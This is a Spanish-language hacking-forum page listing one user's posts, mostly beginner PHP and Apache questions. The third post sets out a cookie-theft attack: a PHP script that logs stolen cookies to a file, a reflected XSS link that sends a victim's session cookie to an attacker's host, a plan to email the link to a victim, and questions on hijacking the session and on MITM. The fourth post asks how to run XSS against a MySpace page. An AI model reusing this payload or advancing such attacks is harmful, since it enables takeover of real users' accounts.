elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: [1]
1  Programación / PHP / Secciones en php en: 23 Mayo 2007, 00:24 am
Que son secciones en php, y donde encuentro amplia documentación sobre el tema? (por lo poco que entiendo creo que esto de las secciones va por ahi de la autenticación de usuarios, no?)

PD: es que la oficial no muy la entiendo, jeje...
2  Programación / PHP / Redireccion a otro sitio.. en: 10 Mayo 2007, 20:05 pm
Esto es impresindible para mi sitio, fijense que
tengo este script en php, que en teoria me deberia redireccionar, pero no lo hace, no se porque, vean:

<?
echo "<script>window.location=http://www.dominio.us</script>";
?>

luego probe con esto:

header("Location: http://www.dominio.com");

pero me dio error, que OTRO script, en php o java puedo usar??

Saludos
3  Seguridad Informática / Nivel Web / XSS ---falsificando sesiones en: 7 Mayo 2007, 19:09 pm
Robo de cookie de sesion del sitio vulnerable.com, sitio en el que yo ya soy usuario registrado y también lo es la victima...

-Primero encontramos una caja de Buscaqueda vulnerable.
-A continuacion vamos a crear una pagina en php, este archivo creará otro (archivo.txt)  que nos mandará la cookie victima, el archivo a crear es robo.php, con este codigo:

<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

-Luego crear la url que al ser clikeada mandará la cookie victima a nuestro archivo.txt

http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/robo.php?cookie='+document.cookie;</script>&buscar=;

le mandamos el link a su email, está lo recibira y al dar click nos apoderaremos de su cookie.
-Luego falsificar el valor de nuestra cookie por el valor que le robamos a la victima, y listo.

------------Aqui es donde tengo este monton de preguntas:
------------
1-Para que funcione el ataque: ¿la victima tien que estar logueada primero en vulnerable.com luego se va a revistar su email y ejecuta el link maligno, ó el ataque funcionaría de todos modos si la victima solo llega a conectarse y lo primero y único que hace es abrir su email y hacer click en el link maligno, sin estar logueada en su cuenta de vulnerable.com??

2-En el código del archivo robo.php (que guardara el valor de la cookie robada en un fichero) se debe utilizar la función $_GET['cookie'], pero otros usan la función $_REQUEST, no hay problema? es lo mismo, verdad?

3-Siguiendo en el código de robo.php  ¿de que manera mi server que soporta php debe tener configurado su php.ini, hay problema si su php.ini tiene configuradas las variables
globales asi: register_globals OFF? o en el codigo de robo.php no importa si las variables globales están en ON ó en OFF?

4-haciendo uso de un script que se coloca en la barra de direcciones del navegador puedo ver el contenido de mi cookie
"javascript:void(document.cookie=prompt("Modifica el valor de la cookie",document.cookie).split(";"));"

que es una cadena de caracteres sin sentido! Me imagino que en el archivo.txt donde se escribirá la cookie robada, será ésta cadena de caracteres parecida a la mia, no?, es asi?

4.1 En caso de que sean las cadenas similares, para evitar un ataque Man In The Middle,  ¿puedo copiar esa cadena (cookie) victima, luego escribir el script en mi barra de direcciones  para ver mi cookie actual de mi cuenta en vulnerable.com y luego borrar la cadena que constituye mi cookie  y pegar la cadena de caracteres que constituye la cookie de la victima, y al dar click a Aceptar,  estaré logueado como la victima?

4.2 Si es que funciona este reemplazo de cadenas, la mia actual por la que me llego al archivo cookies.txt (que es la cadena que constituye la cookie de la victima), primero debo estar  logueado en vulnerable.com como yo (atacante) y en la misma ventana hacer el cambio de cadenas cookies, y luego aceptar y listo? ya estaría hecha la falsificacion de sesion..?

5 En caso de lo que arriba no funcione como puedo hacer un ataque Man in the Middle que programa de facil uso puedo usar? Este ataque MITM con el objeto de interceptar y editar las cabeceras HTTP para el cambio de cookies.. (eso de cabeceras y mitm, no me queda claro)

6-Durante todo este proceso en que capturo la cookie victima, hasta el final del MITM, ¿la victima debe estar online logueada en su sesion de vulnerable.com?, pero si está logueada mientras yo me robo y uso su cookie, ¿vulnerable.com permitiría que el mismo usuario este logueado dos veces en el mismo momento? ¿O en que parte del proceso del ataque la victima debería desconectarse?, sí es que tiene que hacerlo.....  porque las cookies tienen
un tiempo en que expiran no? es decir si me robo la cookie de algun usuario, bueno pues,  esta no me va a servir de por vida, es decir que me servirá una hora? dos horas? un día?,
por lo que la victima tiene que activarme su cookie durante un tiempito para que cuando me la robe, y la use, no haya expirado, no??

Saludos y de antemano gracias por las respuestas...
4  Seguridad Informática / Nivel Web / Cross Site Scripting en Myspace.com en: 25 Abril 2007, 20:06 pm
Como puedo concretar este tipo de ataque contra un espacio de myspace -por ejemplo el mio-.?? 

Primero que escaner de vulnerabilidades web -que sea de facil uso- me recomiendan.
Luego como concreto el ataque de XSS?
A que cifrar los scripts o algo?
Cuantas probabilidades de exito tendria este ataque del 1-10???

Saludos



Un foro libre para información Libre.  Compartir.--
5  Programación / PHP / Apache+php+mysql sin conexion... en: 5 Diciembre 2006, 17:52 pm
Instalé el appserv 2.5.7, pero quiero probar tanto Apache, php como Mysql sin conexión,
despues de la instalación no puedo ejecutar Apache porque me da error, modifique el
httpd.conf en el servername por 127.0.0.1:80 (que es uno de los datos que piden durante
la instalación del appserv 2.5.7) pero sigo sin poder ejecutar el apache....


Esto es lo que me dice al ejecutar Apache2.2.exe
-----------------------------------------------------------------------------------------------------------

Apache 2.2 daemon is Starting ...


##########################################
## Stop Apache Please Close This Window ##
##########################################
(OS 10048)Sólo se permite un uso de cada dirección de socket (protocolo/dirección
de red/puerto)  : make_sock: could not bind to address 0.0.0.0:80
no listening sockets available, shutting down
Unable to open logs
Presione una tecla para continuar . . .
-----------------------------------------------------------------------------------------------------------
Este error es aún despues de modificar el httpd.conf en ServerName por 127.0.0.1
(donde le indico mi loopip, para uso sin conexion, la razon por la que modifico ServerName es
porque me parece que por ahi va el error)


Saludos....
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines